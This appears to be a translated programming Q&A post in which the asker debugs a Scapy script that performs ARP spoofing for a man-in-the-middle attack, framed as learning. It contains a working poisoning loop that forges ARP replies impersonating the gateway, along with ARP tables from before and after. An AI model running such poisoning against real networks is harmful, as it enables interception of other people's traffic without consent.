ARP Spoofing влияет на ПК, отправляющего пакет - PullRequest
0 голосов
/ 21 марта 2019

Я пытаюсь создать атаку MITM с использованием ARP Spoofing просто для изучения, и когда я выполняю сценарий, шлюз по умолчанию моей машины также изменяется, даже если я не отправляю пакет ARP на мою машину.

Что я пытался сделать, чтобы это исправить:

Я пытался отправить пакет ARP только на мой компьютер, который изменяет IPv6-адрес шлюза по умолчанию обратно на исходный IPv6-адрес, но этопохоже, не работает.

Вот код отравления:

def poison():
    global threadGo
    ip_to_infect = sys.argv[1]
    ip_to_infect_v6 = sys.argv[2] 
    default_gateway = sys.argv[3] 
    my_ip_v6 = Ether().src
    poison_packet = ARP(hwsrc=my_ip_v6,hwdst=ip_to_infect_v6, pdst=ip_to_infect,psrc=default_gateway, op=2)
    # My attempt at fixing it below this line
    my_ip = IP().src
    default_gate = "*default_gateway*"
    restore_my_self = ARP(psrc=default_gateway, hwsrc=default_gate, hwdst=my_ip_v6, pdst=my_ip)
    # My attempt at fixing the problem is above this line
    print("[+] Poisoning %s\n" % (ip_to_infect))
    while True:
        send(restore_my_self, count=1, verbose=False)
        send(poison_packet,count=1, verbose=False) # Attempt to fix

Это список arp атакующей машины до:

Address                HWtype   HWaddress          Flags Mask      Iface

10.0.0.138             ether    *default_gateway*  C               wlp3s

и после:

Address                HWtype   HWaddress          Flags Mask      Iface

10.0.0.138             ether    *my_ip_v6*         C               wlp3s

И это список arp моей машины до:

Internet Address      Physical Address      Type
10.0.0.138            *default_gateway*     dynamic

и после:

Internet Address      Physical Address      Type
10.0.0.138            *my_ip_v6*            dynamic

РЕДАКТИРОВАТЬ: я просто использовал wireshark, чтобы посмотреть, что происходит,и по какой-то причине я отправляю пакеты ARP на мою машину.Что здесь происходит?

...